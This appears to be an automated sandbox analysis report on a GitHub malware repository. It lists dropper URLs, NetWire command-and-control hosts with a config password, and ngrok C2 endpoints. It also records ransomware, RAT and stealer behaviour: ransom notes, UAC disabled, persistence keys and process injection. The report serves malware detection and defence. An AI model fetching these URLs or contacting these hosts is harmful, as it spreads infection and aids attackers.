chimera | hxxps://github[.]com/Da2dalus/The-MALWARE-Repo

Analysis

max time kernel
600s
max time network
638s
platform
windows11-21h2_x64
resource
win11-20240221-en
resource tags

arch:x64arch:x86image:win11-20240221-enlocale:en-usos:windows11-21h2-x64system
submitted
29-03-2024 23:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://github.com/Da2dalus/The-MALWARE-Repo

Score

10^/10

chimera modiloader netwire revengerat aspackv2 botnet evasion persistence ransomware rat spyware stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://blockchainjoblist.com/wp-admin/014080/

exe.dropper

https://womenempowermentpakistan.com/wp-admin/paba5q52/

exe.dropper

https://atnimanvilla.com/wp-content/073735/

exe.dropper

https://yeuquynhnhai.com/upload/41830/

exe.dropper

https://deepikarai.com/js/4bzs6/

Extracted

Family

modiloader

https://drive.google.com/u/0/uc?id=1TcSctGVBajYMA7CFDc158wpvqkpxmkhJ&export=download

Extracted

Family

netwire

tamerimia.ug:6975

vbchjfssdfcxbcver.ru:6975

Attributes

activex_autorun
false
copy_executable
false
delete_original
false
host_id
AAAAA
lock_executable
false
mutex
CQbRXVuG
offline_keylogger
false
password
jhbkdcfgvdfgknl
registry_autorun
false
use_mutex
true

Signatures

Chimera 34 IoCs

Ransomware which infects local and network files, often distributed via Dropbox links.

ransomware chimera

Processes:

NetWire.exemsedge.exe

description	ioc	process
File created	C:\Program Files\Java\jdk-1.8\jre\lib\YOUR_FILES_ARE_ENCRYPTED.HTML	NetWire.exe
File created	C:\Program Files\Java\jdk-1.8\jre\bin\server\YOUR_FILES_ARE_ENCRYPTED.HTML	NetWire.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\YOUR_FILES_ARE_ENCRYPTED.HTML	NetWire.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\YOUR_FILES_ARE_ENCRYPTED.HTML	NetWire.exe
File created	C:\Program Files\YOUR_FILES_ARE_ENCRYPTED.HTML	NetWire.exe
File created	C:\Program Files\Microsoft Office\root\Office16\1033\YOUR_FILES_ARE_ENCRYPTED.HTML	NetWire.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\YOUR_FILES_ARE_ENCRYPTED.HTML	NetWire.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\DataCollection	msedge.exe
File created	C:\Program Files\Java\jdk-1.8\jre\YOUR_FILES_ARE_ENCRYPTED.HTML	NetWire.exe
File created	C:\Program Files\Microsoft Office\root\Office16\YOUR_FILES_ARE_ENCRYPTED.HTML	NetWire.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\YOUR_FILES_ARE_ENCRYPTED.HTML	NetWire.exe
File created	C:\Program Files\Microsoft Office\root\Office16\PersonaSpy\YOUR_FILES_ARE_ENCRYPTED.HTML	NetWire.exe
File created	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\YOUR_FILES_ARE_ENCRYPTED.HTML	NetWire.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\YOUR_FILES_ARE_ENCRYPTED.HTML	NetWire.exe
File created	C:\Program Files\Java\jre-1.8\YOUR_FILES_ARE_ENCRYPTED.HTML	NetWire.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\requests\YOUR_FILES_ARE_ENCRYPTED.HTML	NetWire.exe
98	bot.whatismyipaddress.com
File created	C:\Program Files\Java\jre-1.8\lib\YOUR_FILES_ARE_ENCRYPTED.HTML	NetWire.exe
File created	C:\Program Files\Java\jre-1.8\bin\server\YOUR_FILES_ARE_ENCRYPTED.HTML	NetWire.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\YOUR_FILES_ARE_ENCRYPTED.HTML	NetWire.exe
File created	C:\Program Files\7-Zip\YOUR_FILES_ARE_ENCRYPTED.HTML	NetWire.exe
File created	C:\Program Files\VideoLAN\VLC\YOUR_FILES_ARE_ENCRYPTED.HTML	NetWire.exe
File created	C:\Program Files\Microsoft Office\root\Office16\MSIPC\YOUR_FILES_ARE_ENCRYPTED.HTML	NetWire.exe
File created	C:\Program Files\dotnet\YOUR_FILES_ARE_ENCRYPTED.HTML	NetWire.exe
File created	C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\LanguageNames2\YOUR_FILES_ARE_ENCRYPTED.HTML	NetWire.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\Adobe\YOUR_FILES_ARE_ENCRYPTED.HTML	NetWire.exe
File created	C:\Program Files\7-Zip\Lang\YOUR_FILES_ARE_ENCRYPTED.HTML	NetWire.exe
File created	C:\Program Files\Java\jdk-1.8\YOUR_FILES_ARE_ENCRYPTED.HTML	NetWire.exe
File created	C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\YOUR_FILES_ARE_ENCRYPTED.HTML	NetWire.exe
File created	C:\Program Files\Microsoft Office\root\Office16\Configuration\YOUR_FILES_ARE_ENCRYPTED.HTML	NetWire.exe
File created	C:\Program Files\Microsoft Office\root\Office16\LivePersonaCard\YOUR_FILES_ARE_ENCRYPTED.HTML	NetWire.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\YOUR_FILES_ARE_ENCRYPTED.HTML	NetWire.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\IDTemplates\ENU\YOUR_FILES_ARE_ENCRYPTED.HTML	NetWire.exe
File created	C:\Program Files\Microsoft Office\root\Office16\AugLoop\YOUR_FILES_ARE_ENCRYPTED.HTML	NetWire.exe

ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
trojan modiloader

NetWire RAT payload 1 IoCs

rat

Processes:

resource	yara_rule
behavioral2/memory/5608-4193-0x0000000000400000-0x0000000000433000-memory.dmp	netwire

Netwire
Netwire is a RAT with main functionalities focused password stealing and keylogging, but also includes remote control capabilities as well.
botnet stealer netwire

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

powershell.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4892	5796	powershell.exe

RevengeRAT
Remote-access trojan with a wide range of capabilities.
trojan revengerat

UAC bypass 3 TTPs 2 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

reg.exereg.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

ModiLoader First Stage 3 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\Downloads\Unconfirmed 287668.crdownload	modiloader_stage1
behavioral2/memory/4500-4130-0x0000000010410000-0x000000001047E000-memory.dmp	modiloader_stage1
behavioral2/memory/4500-4192-0x0000000010410000-0x000000001047E000-memory.dmp	modiloader_stage1

Renames multiple (185) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware

RevengeRat Executable 1 IoCs

stealer

Processes:

resource	yara_rule
C:\Users\Admin\Downloads\Unconfirmed 118326.crdownload	revengerat

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

81 4892 powershell.exe
82 4892 powershell.exe
Downloads MZ/PE file
Modifies Windows Firewall 2 TTPs 1 IoCs
evasion

Windows Service
T1543.003

Disable or Modify System Firewall
T1562.004

Processes:

netsh.exe

pid process

5892 netsh.exe

flow	pid	process
81	4892	powershell.exe
82	4892	powershell.exe

pid	process
5892	netsh.exe

Sets file to hidden 1 TTPs 64 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1564.001

Processes:

attrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exe

pid	process
4912	attrib.exe
7120	attrib.exe
6576	attrib.exe
9584	attrib.exe
7912	attrib.exe
8140	attrib.exe
8628	attrib.exe
8580	attrib.exe
9576	attrib.exe
7140	attrib.exe
3384	attrib.exe
6788	attrib.exe
3316	attrib.exe
7188	attrib.exe
10204	attrib.exe
7900	attrib.exe
10324	attrib.exe
3040	attrib.exe
4112	attrib.exe
5216	attrib.exe
8976	attrib.exe
7116	attrib.exe
7316	attrib.exe
10716	attrib.exe
1516	attrib.exe
6488	attrib.exe
8888	attrib.exe
2652	attrib.exe
7088	attrib.exe
2904	attrib.exe
8500	attrib.exe
11028	attrib.exe
2128	attrib.exe
4188	attrib.exe
352	attrib.exe
8056	attrib.exe
8320	attrib.exe
7548	attrib.exe
9576	attrib.exe
10796	attrib.exe
5540	attrib.exe
2744	attrib.exe
7904	attrib.exe
7500	attrib.exe
4692	attrib.exe
1396	attrib.exe
5220	attrib.exe
6792	attrib.exe
8000	attrib.exe
2960	attrib.exe
6368	attrib.exe
9200	attrib.exe
3164	attrib.exe
10336	attrib.exe
2780	attrib.exe
5152	attrib.exe
1060	attrib.exe
7532	attrib.exe
6808	attrib.exe
8104	attrib.exe
9300	attrib.exe
1020	attrib.exe
1932	attrib.exe
6448	attrib.exe

ASPack v2.12-2.42 1 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

Processes:

resource	yara_rule
C:\Users\Admin\Downloads\Unconfirmed 388874.crdownload	aspack_v212_v242

Drops startup file 3 IoCs

Processes:

NJRat.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\b9584a316aeb9ca9b31edd4db18381f5.exe	NJRat.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\b9584a316aeb9ca9b31edd4db18381f5.exe	NJRat.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\b9584a316aeb9ca9b31edd4db18381f5.exe\:SmartScreen:$DATA	NJRat.exe

Executes dropped EXE 18 IoCs

Processes:

NetWire.exeNetWire.exeNJRat.exeRemcos.exeRevengeRAT.exeHawkEye.exeNetWire.exeNJRat.exeRemcos.exeRevengeRAT.exeNetWire.exeRemcos.exeRemcos.exeNJRat.exeNetWire.exeDanaBot.exeNetWire.exeCurfun.exe

pid	process
4768	NetWire.exe
4500	NetWire.exe
2260	NJRat.exe
3664	Remcos.exe
1772	RevengeRAT.exe
3344	HawkEye.exe
2756	NetWire.exe
2056	NJRat.exe
4856	Remcos.exe
4680	RevengeRAT.exe
4624	NetWire.exe
5292	Remcos.exe
5372	Remcos.exe
5300	NJRat.exe
1560	NetWire.exe
5760	DanaBot.exe
3560	NetWire.exe
4968	Curfun.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

NJRat.exeNetWire.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3084248216-1643706459-906455512-1000\Software\Microsoft\Windows\CurrentVersion\Run\b9584a316aeb9ca9b31edd4db18381f5 = "\"C:\\Users\\Admin\\Desktop\\New folder\\NJRat.exe\" .."	NJRat.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\b9584a316aeb9ca9b31edd4db18381f5 = "\"C:\\Users\\Admin\\Desktop\\New folder\\NJRat.exe\" .."	NJRat.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3084248216-1643706459-906455512-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Qspt = "C:\\Users\\Admin\\AppData\\Local\\Qspt\\Qspt.hta"	NetWire.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 8 IoCs

Web Service

T1102

Processes:

flow	ioc
4	0.tcp.ngrok.io
14	drive.google.com
15	raw.githubusercontent.com
74	raw.githubusercontent.com
89	drive.google.com
116	0.tcp.ngrok.io
141	0.tcp.ngrok.io
172	0.tcp.ngrok.io

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

98 bot.whatismyipaddress.com

flow	ioc
98	bot.whatismyipaddress.com

Drops file in System32 directory 8 IoCs

Processes:

Remcos.exeRemcos.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\remcos\logs.dat	Remcos.exe
File created	C:\Windows\SysWOW64\remcos\logs.dat	Remcos.exe
File created	C:\Windows\SysWOW64\Userdata\Userdata.exe	Remcos.exe
File opened for modification	C:\Windows\SysWOW64\Userdata\Userdata.exe	Remcos.exe
File created	C:\Windows\SysWOW64\Userdata\Userdata.exe:SmartScreen:$DATA	Remcos.exe
File created	C:\Windows\SysWOW64\Userdata\Userdata.exe	Remcos.exe
File opened for modification	C:\Windows\SysWOW64\Userdata\Userdata.exe	Remcos.exe
File created	C:\Windows\SysWOW64\Userdata\Userdata.exe:SmartScreen:$DATA	Remcos.exe

Suspicious use of SetThreadContext 6 IoCs

Processes:

Remcos.exeRevengeRAT.exeRegSvcs.exeNetWire.exeRevengeRAT.exeRegSvcs.exe

description	pid	process	target process
PID 3664 set thread context of 3924	3664	Remcos.exe	iexplore.exe
PID 1772 set thread context of 1124	1772	RevengeRAT.exe	RegSvcs.exe
PID 1124 set thread context of 4884	1124	RegSvcs.exe	RegSvcs.exe
PID 4500 set thread context of 5608	4500	NetWire.exe	ieinstal.exe
PID 4680 set thread context of 2016	4680	RevengeRAT.exe	RegSvcs.exe
PID 2016 set thread context of 348	2016	RegSvcs.exe	RegSvcs.exe

Drops file in Program Files directory 64 IoCs

Processes:

NetWire.exe

description	ioc	process
File opened for modification	C:\Program Files\7-Zip\Lang\id.txt	NetWire.exe
File opened for modification	C:\Program Files\7-Zip\Lang\de.txt	NetWire.exe
File created	C:\Program Files\Java\jre-1.8\bin\server\YOUR_FILES_ARE_ENCRYPTED.HTML	NetWire.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\Configuration\ssn_high_group_info.txt	NetWire.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\README.txt	NetWire.exe
File opened for modification	C:\Program Files\7-Zip\Lang\hi.txt	NetWire.exe
File opened for modification	C:\Program Files\7-Zip\History.txt	NetWire.exe
File created	C:\Program Files\Java\jdk-1.8\YOUR_FILES_ARE_ENCRYPTED.HTML	NetWire.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\ExcelMessageDismissal.txt	NetWire.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\Words.pdf	NetWire.exe
File opened for modification	C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt	NetWire.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\ThirdPartyNotices.MSHWLatin.txt	NetWire.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\LyncVDI_Eula.txt	NetWire.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\AccessMessageDismissal.txt	NetWire.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Adobe Sign White Paper.pdf	NetWire.exe
File opened for modification	C:\Program Files\7-Zip\Lang\uz.txt	NetWire.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\THIRDPARTYLICENSEREADME-JAVAFX.txt	NetWire.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\ClientOSub_eula.txt	NetWire.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\requests\YOUR_FILES_ARE_ENCRYPTED.HTML	NetWire.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.12827.20400.0_x64__8wekyb3d8bbwe\office.odf	NetWire.exe
File opened for modification	C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt	NetWire.exe
File opened for modification	C:\Program Files\7-Zip\Lang\sw.txt	NetWire.exe
File opened for modification	C:\Program Files\7-Zip\Lang\fi.txt	NetWire.exe
File opened for modification	C:\Program Files\7-Zip\Lang\et.txt	NetWire.exe
File opened for modification	C:\Program Files\7-Zip\Lang\af.txt	NetWire.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\+Connect to New Data Source.odc	NetWire.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\YOUR_FILES_ARE_ENCRYPTED.HTML	NetWire.exe
File opened for modification	C:\Program Files\7-Zip\Lang\yo.txt	NetWire.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ro.txt	NetWire.exe
File opened for modification	C:\Program Files\7-Zip\Lang\az.txt	NetWire.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\AUTHORS.txt	NetWire.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\1494870C-9912-C184-4CC9-B401-A53F4D8DE290.pdf	NetWire.exe
File opened for modification	C:\Program Files\7-Zip\Lang\zh-cn.txt	NetWire.exe
File opened for modification	C:\Program Files\7-Zip\Lang\mk.txt	NetWire.exe
File created	C:\Program Files\Java\jdk-1.8\jre\bin\server\YOUR_FILES_ARE_ENCRYPTED.HTML	NetWire.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ga.txt	NetWire.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ba.txt	NetWire.exe
File opened for modification	C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\en-US\about_Mocking.help.txt	NetWire.exe
File opened for modification	C:\Program Files\7-Zip\Lang\nl.txt	NetWire.exe
File opened for modification	C:\Program Files\7-Zip\Lang\be.txt	NetWire.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\WacLangPackEula.txt	NetWire.exe
File opened for modification	C:\Program Files\7-Zip\Lang\it.txt	NetWire.exe
File opened for modification	C:\Program Files\7-Zip\Lang\hy.txt	NetWire.exe
File created	C:\Program Files\Microsoft Office\root\Office16\PersonaSpy\YOUR_FILES_ARE_ENCRYPTED.HTML	NetWire.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\YOUR_FILES_ARE_ENCRYPTED.HTML	NetWire.exe
File opened for modification	C:\Program Files\7-Zip\Lang\kk.txt	NetWire.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\README.txt	NetWire.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\ClientSub_eula.txt	NetWire.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\ClientLangPack_eula.txt	NetWire.exe
File opened for modification	C:\Program Files\Windows NT\TableTextService\TableTextServiceTigrinya.txt	NetWire.exe
File opened for modification	C:\Program Files\7-Zip\Lang\fur.txt	NetWire.exe
File created	C:\Program Files\dotnet\YOUR_FILES_ARE_ENCRYPTED.HTML	NetWire.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\THIRDPARTYLICENSEREADME.txt	NetWire.exe
File opened for modification	C:\Program Files\Java\jre-1.8\THIRDPARTYLICENSEREADME.txt	NetWire.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.41182.0_x64__8wekyb3d8bbwe\Third Party Notices.txt	NetWire.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\ClientARMRefer2019_eula.txt	NetWire.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\YOUR_FILES_ARE_ENCRYPTED.HTML	NetWire.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\MobileAcrobatCard_Dark.pdf	NetWire.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\YOUR_FILES_ARE_ENCRYPTED.HTML	NetWire.exe
File opened for modification	C:\Program Files\WindowsApps\MicrosoftWindows.Client.WebExperience_321.14700.0.9_x64__cw5n1h2txyewy\NOTICE.txt	NetWire.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\Adobe\YOUR_FILES_ARE_ENCRYPTED.HTML	NetWire.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ka.txt	NetWire.exe
File created	C:\Program Files\Microsoft Office\root\Office16\AugLoop\YOUR_FILES_ARE_ENCRYPTED.HTML	NetWire.exe
File created	C:\Program Files\YOUR_FILES_ARE_ENCRYPTED.HTML	NetWire.exe

Program crash 3 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exe

pid pid_target process target process

4360 5760 WerFault.exe DanaBot.exe
2708 6124 WerFault.exe DanaBot.exe
6656 6336 WerFault.exe notepad.exe

pid	pid_target	process	target process
4360	5760	WerFault.exe	DanaBot.exe
2708	6124	WerFault.exe	DanaBot.exe
6656	6336	WerFault.exe	notepad.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exe

pid process

5320 schtasks.exe

pid	process
5320	schtasks.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exeWINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Modifies registry class 1 IoCs

Processes:

msedge.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-3084248216-1643706459-906455512-1000_Classes\Local Settings msedge.exe
Modifies registry key 1 TTPs 2 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exe

pid process

3332 reg.exe
4236 reg.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3084248216-1643706459-906455512-1000_Classes\Local Settings	msedge.exe

pid	process
3332	reg.exe
4236	reg.exe

NTFS ADS 34 IoCs

Processes:

msedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exeRegSvcs.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Downloads\AgentTesla.exe:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 291612.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 726192.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 229092.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 118326.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 82518.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Babylon12_Setup.exe:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 388874.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\NetWire.exe:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Remcos.exe:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Emotet.zip:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 220067.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\ChilledWindows.exe:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\DanaBot.exe:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 994641.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 287668.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\NJRat.exe:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Blackkomet.exe:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 965679.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\CobaltStrike.doc:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Adwind.exe:Zone.Identifier	msedge.exe
File created	C:\svchost\svchost.exe\:SmartScreen:$DATA	RegSvcs.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 275295.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 822400.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Avoid.exe:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\HawkEye.exe:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\RevengeRAT.exe:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 863134.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 625098.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 115389.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\butterflyondesktop.exe:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 67136.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 125330.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Curfun.exe:Zone.Identifier	msedge.exe

Suspicious behavior: AddClipboardFormatListener 2 IoCs

Processes:

WINWORD.EXE

pid process

3712 WINWORD.EXE
3712 WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

msedge.exemsedge.exeidentity_helper.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exepowershell.exemsedge.exeNJRat.exe

pid	process
3964	msedge.exe
3964	msedge.exe
1704	msedge.exe
1704	msedge.exe
2828	identity_helper.exe
2828	identity_helper.exe
3164	msedge.exe
3164	msedge.exe
6060	msedge.exe
6060	msedge.exe
5632	msedge.exe
5632	msedge.exe
5632	msedge.exe
5632	msedge.exe
5844	msedge.exe
5844	msedge.exe
5728	msedge.exe
5728	msedge.exe
5484	msedge.exe
5484	msedge.exe
5920	msedge.exe
5920	msedge.exe
5152	msedge.exe
5152	msedge.exe
2608	msedge.exe
2608	msedge.exe
4664	msedge.exe
4664	msedge.exe
4624	msedge.exe
4624	msedge.exe
5968	msedge.exe
5968	msedge.exe
856	msedge.exe
856	msedge.exe
3416	msedge.exe
3416	msedge.exe
5248	msedge.exe
5248	msedge.exe
1668	msedge.exe
1668	msedge.exe
6064	msedge.exe
6064	msedge.exe
4892	powershell.exe
4892	powershell.exe
4892	powershell.exe
3372	msedge.exe
3372	msedge.exe
2260	NJRat.exe
2260	NJRat.exe
2260	NJRat.exe
2260	NJRat.exe
2260	NJRat.exe
2260	NJRat.exe
2260	NJRat.exe
2260	NJRat.exe
2260	NJRat.exe
2260	NJRat.exe
2260	NJRat.exe
2260	NJRat.exe
2260	NJRat.exe
2260	NJRat.exe
